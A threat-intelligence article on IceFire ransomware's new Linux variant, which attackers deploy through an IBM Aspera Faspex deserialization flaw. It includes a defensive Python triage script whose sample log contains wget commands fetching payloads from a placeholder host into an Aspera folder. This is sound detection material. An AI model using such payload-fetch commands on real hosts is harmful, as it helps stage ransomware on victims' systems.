
IceFire Operators Introduce Linux Variant, Abuse IBM Flaw

Several ransomware groups have been turning to Linux environments as a less-contested market that can yield a higher return on investment. Recently, IceFire ransomware launched a Linux variant to target media and entertainment organizations worldwide.

What was found?

SentinelOne researchers have observed the latest malware strain being used against victims in Turkey, Iran, Pakistan, and the UAE since mid-February.
  • Attackers exploited a recently patched deserialization vulnerability (CVE-2022-47986) in IBM Aspera Faspex to deploy the IceFire ransomware.
  • The latest IceFire variant is a 2.18 MB, 64-bit ELF binary compiled with GCC for the AMD64 architecture.
  • The binary contains many statically linked functions from the legitimate OpenSSL library and a hardcoded RSA public key.

Malware infection and hosting

  • IceFire is deployed against CentOS hosts running a vulnerable version of Aspera Faspex.
  • The compromised host downloads two payloads with wget and saves them to an Aspera subfolder.
  • The payloads are hosted on a DigitalOcean droplet.

Encryption and deleting traces

  • IceFire encrypts the files on execution and appends the '.ifire' extension to the filename.
  • It automatically drops a ransom note that contains a unique hardcoded username and password that the victim can use to log into the attackers' Tor-based ransom payment portal.
  • Notably, IceFire avoids encrypting files with specific extensions pertaining to executables, applications, or system functionality.
  • It does not encrypt every file on the host and skips specific paths, so critical system components remain operational.
  • Finally, it deletes itself by removing the binary to cover its tracks.
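The behaviours above translate into a few host-side checks a responder can run on a suspect Faspex server. The script below is an added example, not code from the Cyware or SentinelOne write-ups; it assumes a simplified execution-log format, and every payload name, host and URL in the constructed sample is a placeholder.

```python
"""Host triage helpers for the IceFire Linux behaviours summarised above (added example)."""
import os
import re

IFIRE_EXT = ".ifire"  # extension IceFire appends to encrypted files

# Constructed sample log in a simplified "ts host comm cmd" format; this is not real
# telemetry, and the payload names and URLs are placeholders.
SAMPLE_LOG = [
    '2023-02-20T10:01:12 host1 comm=wget cmd="wget -O /opt/aspera/faspex/PLACEHOLDER_PAYLOAD http://PLACEHOLDER_HOST/p1"',
    '2023-02-20T10:01:13 host1 comm=wget cmd="wget -O /opt/aspera/faspex/PLACEHOLDER_PAYLOAD2 http://PLACEHOLDER_HOST/p2"',
    '2023-02-20T10:05:00 host1 comm=curl cmd="curl -s https://updates.example.invalid/check"',
    '2023-02-20T10:07:31 host1 comm=wget cmd="wget -O /home/ops/notes.txt http://intranet.example.invalid/notes.txt"',
]

# Matches a wget invocation and captures the -O destination path.
WGET_RE = re.compile(r'cmd="wget\b[^"]*?\s-O\s+(?P<dest>\S+)')


def encrypted_files(paths):
    """Return every path carrying the '.ifire' extension, sorted for stable reporting."""
    return sorted(p for p in paths if p.endswith(IFIRE_EXT))


def staged_downloads(log_lines, marker="/aspera/"):
    """Return wget destinations inside an Aspera subfolder (the staging step in the article)."""
    hits = []
    for line in log_lines:
        m = WGET_RE.search(line)
        if m and marker in m.group("dest").lower():
            hits.append(m.group("dest"))
    return hits


def deleted_exe(proc_entries):
    """PIDs whose executable was unlinked while running; Linux marks these '(deleted)'."""
    return sorted(pid for pid, target in proc_entries if target.endswith(" (deleted)"))


def proc_exe_entries(proc_root="/proc"):
    """Yield (pid, exe link target) for live processes; other users' links need root."""
    for name in os.listdir(proc_root):
        if name.isdigit():
            try:
                yield int(name), os.readlink(os.path.join(proc_root, name, "exe"))
            except OSError:
                continue  # process exited or permission denied


if __name__ == "__main__":
    print("staged payloads:", staged_downloads(SAMPLE_LOG))
    print("self-deleted binaries still running:", deleted_exe(proc_exe_entries()))
```

A running process whose `/proc/<pid>/exe` ends in `(deleted)` is exactly the trace a self-removing binary leaves until it exits, so the last check is worth running before rebooting a suspect host.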

Conclusion

More organizations today use Linux-based systems to perform crucial tasks, making them valuable targets. To counter such threats, organizations should follow a multi-faceted approach that prioritizes visibility, awareness, and robust patch management to ensure multi-layered security.
Cyware Publisher